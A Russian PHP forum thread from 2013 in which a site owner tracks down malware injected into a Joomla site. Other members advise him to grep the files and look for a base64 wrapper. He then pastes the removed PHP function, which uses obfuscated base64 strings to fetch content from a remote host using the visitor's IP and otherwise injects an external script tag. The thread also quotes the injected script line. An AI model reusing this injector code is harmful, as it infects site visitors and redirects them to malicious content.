[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Вирус в joomla
Форум PHP программистов > PHP для знатоков
kuzroman
22.04.2013 - 14:44
Привет всем, вопрос может не в кассу, но все же задам.

Прошу помочь найти место с вирусом.
На сайте http://energo-grup.ru если взглянуть на исходный код, в самом низу кода появилась строка
</html><script src="http://msfikmv.podzone.org/rsize.js"></script>
Это js который динамически создает фрейм, за что яндекс сайт кидает в категорию зараженный.
Вопрос: в каком месте происходит подгрузка этого кода?
В Joomla не работал, с его архитектурой не знаком, помню раньше уже такое было, удалил этот код из одного файла и все было решено.

_____________
kuzroman@list.ru
forza
22.04.2013 - 14:54
Грепаните проект (сделайте поиск по содержимому файлов) и найдите места где вставляется этот JS. Если файлов много и лень ручками стирать все, то напишите рекурсивный скрипт который пробежится по файлам и удалит чужеродный код.

_____________
Заработок для веб-разработчиков: CodeCanyon
Мое Портфолио
dron4ik
22.04.2013 - 15:02
index.php в корне, в самом низе длинная закодированная строчка, за комментируй и посмотри!

_____________
Ex3m.com.ua — Активный образ жизни
kuzroman
22.04.2013 - 15:12
Поиск по проекту ничего не находит искал хоть какое то вхождение с urqstmw.gotdns.org/rsize.js (т.е. разбивал на фрагменты тоже), глухо.

В корневом Index.php (помню в прошлый раз нашел именно там). Сейчас там ничего похожего нет. Только php методы.

_____________
kuzroman@list.ru
kuzroman
22.04.2013 - 15:32
убрал метод. Проблема исчезла, главное чтобы проблема в другом не возникла, поскульку с в joomla не секу.

function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$file = @fopen ($get, "r");
		$content = @fread($file, 1000);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWtlc3JyeS5pbmZvL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();


_____________
kuzroman@list.ru
kristall
22.04.2013 - 15:48
Эти вирусы обычно появляются не в результате прямого взлома сайта, а из-за утечки паролей из FTP-клиентов.

_____________
echo '<pre>',print_r($var, 1);die;

root@server# make love && war
killer8080
22.04.2013 - 16:08
kuzroman
копай дальше, sql2_safe это обертка к base64_decode, где то же она объявлена, значит могут быть и другие инородные скрипты. Возможно есть шел.
dron4ik
22.04.2013 - 16:21
там чтото типа base64_decode("ываполдтравслопоыв рабдопбаврлопвжлоар пюловы аолпмвюбам") как написал killer8080

_____________
Ex3m.com.ua — Активный образ жизни
kuzroman
23.04.2013 - 10:17
Цитата (kristall @ 22.04.2013 - 11:48)
Эти вирусы обычно появляются не в результате прямого взлома сайта, а из-за утечки паролей из FTP-клиентов.

Да почитал, я так и подозревал, что ушло из винды, из ftp клиента. Никогда антивирусами не пользовался, ибо вреда не доставляли, лично мне. Хотя если троян может получить доступ к ftp, то и с такой же легкостью может отправить их хозяину.

_____________
kuzroman@list.ru
kuzroman
23.04.2013 - 10:19
Цитата (killer8080 @ 22.04.2013 - 12:08)
kuzroman
копай дальше, sql2_safe это обертка к base64_decode, где то же она объявлена, значит могут быть и другие инородные скрипты. Возможно есть шел.

Ага, там выше был. Тоже убрал.

_____________
kuzroman@list.ru
Быстрый ответ:
Powered by dgreen

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2025 Invision Power Services, Inc.